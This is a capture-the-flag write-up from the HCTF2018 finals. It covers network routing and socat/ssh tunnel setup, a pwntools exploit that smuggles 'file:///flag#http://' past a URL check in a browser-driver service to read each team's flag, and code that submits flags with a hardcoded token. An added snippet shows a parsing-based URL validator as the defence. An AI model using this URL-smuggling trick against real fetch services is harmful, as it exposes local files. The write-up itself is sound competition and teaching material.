HCTF2018 Finals

Author: Kirin_say | Source: published 2018-12-20 13:47, read 54 times

prepare

Router:

Set the route and let the outer network in:
PS C:\WINDOWS\system32> route print
PS C:\WINDOWS\system32> route add 192.168.0.0 mask 255.255.0.0 192.168.17.1
#windows:teamviewer

Something for pwn:

for localhost:
# localhost:6666 <---> remote:8888     by ssh tunnel
ssh -CqTfnN -R 8888:localhost:6666 ctf@192.168.100.100
# localhost:6666  <--->  remoteaddr:remote_port(others or local fake pwn)
socat tcp-listen:6666,fork tcp:192.168.125.125:10001

for remote:
binary:
#!/bin/bash

export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/tmp/socat
/tmp/socat/socat - tcp-connect:localhost:8888

for result:
GameBox Stdin <---> GameBox:8888 <---> localhost:6666  <--->  remoteaddr:remote_port

Something wrong with run.sh:

#!/bin/sh
ulimit -p 30
/usr/bin/timeout 120 /chall/bindriver/bindriver

pwn1

# Python 2 script (print statements) using pwntools
import requests
import json
import time, hashlib
import re
from pwn import *

def submit_flag(flag):
    # Post a captured flag to the scoreboard API as JSON
    token = "61c3c716165073254315e347a895fb279514e0cb"
    url = "http://192.168.200.150:8005/api/team/submit/"+token
    h = {
        "Content-Type":"application/json"
    }
    d = { "flag" : flag }
    d = json.dumps(d)
    print d
    r = requests.post(url, data=d,headers=h)
    print r.text

def get_flag(port):
    try:
        #context.log_level='debug'
        #p=process("./bindriver")
        p=remote("192.168.100.100",port)
        #p.sendline("POST / HTTP/1.1\nHost: 192.168.100.100")
        #gdb.attach(p)
        # Check that the service answers
        p.sendline("GET /status\n \nConnection: Keep-Alive\nHost: localhost")
        #gdb.attach(p)
        p.recvuntil("}\n")
        # Create a session and read back its 8-character sessionId
        p.sendline("POST /session\n \nConnection: Keep-Alive\nHost: localhost")
        p.recvuntil("\"sessionId\": \"")
        session=p.recv(8)
        print session
        p.recvuntil("}\n")
        # Set the session URL to a file: URL whose fragment contains "http://"
        p.send("POST /session/"+session+"/url\n \nConnection: Keep-Alive\nHost: localhost\n{\"url\": \"file:///flag#http://\"}")
        p.recvuntil("}\n")
        # Read the URL back
        p.sendline("GET /session/"+session+"/url\n \nConnection: Keep-Alive\nHost: localhost")
        p.recvuntil("}\n")
        # Fetch the page source and take everything up to the closing brace as the flag
        p.sendline("GET /session/"+session+"/source\n \nConnection: Keep-Alive\nHost: localhost")
        p.recvuntil("source\": \"")
        flag=p.recvuntil("}")
        print flag
        return flag
    except Exception:
        # Connection or parsing failure: skip this target
        return None

def main():
    # One service port per team: 20101 .. 20111
    for ip in range(1,12):
        port = 20100+ip
        flag = get_flag(port)
        if flag is not None:
            submit_flag(flag)

if __name__ == "__main__":
#    while 1:
        main()
#        time.sleep(5)
#        print "-"*20
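
The request body sent by the script above carries a file: URL with "http://" only in its fragment. As an added example (Python 3, not from the original post or the challenge source), this shows a URL check for such an endpoint that parses the URL before deciding, next to a substring check that the same body passes. The names naive_check, strict_check and handle_set_url and the http/https allowlist are assumptions; the page does not show how bindriver checked URLs.

```python
import json
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}  # assumption: the driver should only browse web URLs


def naive_check(url):
    """Hypothetical weak check: accepts anything that mentions http:// anywhere."""
    return "http://" in url or "https://" in url


def strict_check(url):
    """Parse first, then decide on the parsed scheme and host."""
    if any(ord(c) < 0x21 or ord(c) == 0x7f for c in url):
        return False, "control or whitespace character in URL"
    try:
        parts = urlsplit(url)
    except ValueError as exc:
        return False, "unparseable URL: %s" % exc
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, "scheme %r not allowed" % scheme
    if not parts.hostname:
        return False, "missing host"
    return True, "ok"


def handle_set_url(body):
    """Validate the JSON body of a 'POST /session/<id>/url' style request."""
    try:
        url = json.loads(body)["url"]
    except (ValueError, KeyError, TypeError):
        return False, "body must be JSON with a 'url' field"
    if not isinstance(url, str):
        return False, "'url' must be a string"
    return strict_check(url)


if __name__ == "__main__":
    # Constructed sample bodies; the first is the one sent by the script above.
    samples = [
        '{"url": "file:///flag#http://"}',
        '{"url": "http://example.com/index.html"}',
        '{"url": "http:///no-host"}',
        '{"url": 42}',
    ]
    for body in samples:
        print(body, "->", handle_set_url(body))
```

The fragment (everything after "#") never reaches the resource loader, so a decision based on it says nothing about what will be opened; the parsed scheme does.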
